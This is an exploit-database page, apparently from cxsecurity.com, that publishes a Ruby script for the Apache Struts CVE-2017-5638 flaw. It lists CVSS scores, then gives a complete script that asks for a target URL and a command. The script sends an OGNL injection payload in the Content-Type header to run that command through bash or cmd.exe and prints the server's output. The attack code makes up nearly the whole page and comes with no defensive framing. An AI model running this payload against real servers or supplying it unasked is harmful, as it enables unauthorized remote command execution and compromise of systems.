Apache Struts Vulnerability (Ruby Exploit)

2017.04.19
Credit: Mateus Lino
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

require 'typhoeus' #HatBash BR #http://hatbashbr.com/ #https://github.com/hatbashbr #gem install typhoeus #Mateus Lino a.k.a Dctor | Everton a.k.a Xguardian | #CVE - 2017-5638 puts "Insert URL: " target = gets.chomp puts "Insert Command. Exemple: ls" command = gets.chomp cmd = command.each{|i| i}.join(" ") payload = [] payload << "%{(#_='multipart/form-data')." payload << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." payload << "(#_memberAccess?" payload << "(#_memberAccess=#dm):" payload << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." payload << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." payload << "(#ognlUtil.getExcludedPackageNames().clear())." payload << "(#ognlUtil.getExcludedClasses().clear())." payload << "(#context.setMemberAccess(#dm))))." payload << "(#cmd='" payload << cmd.to_s payload << "')." payload << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." payload << "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." payload << "(#p=new java.lang.ProcessBuilder(#cmds))." payload << "(#p.redirectErrorStream(true)).(#process=#p.start())." payload << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." payload << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." payload << "(#ros.flush())}" request = Typhoeus.get(target, headers: {'User-Agent'=>'Mozilla/5','Content-Type'=> payload.join}) puts request.body


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top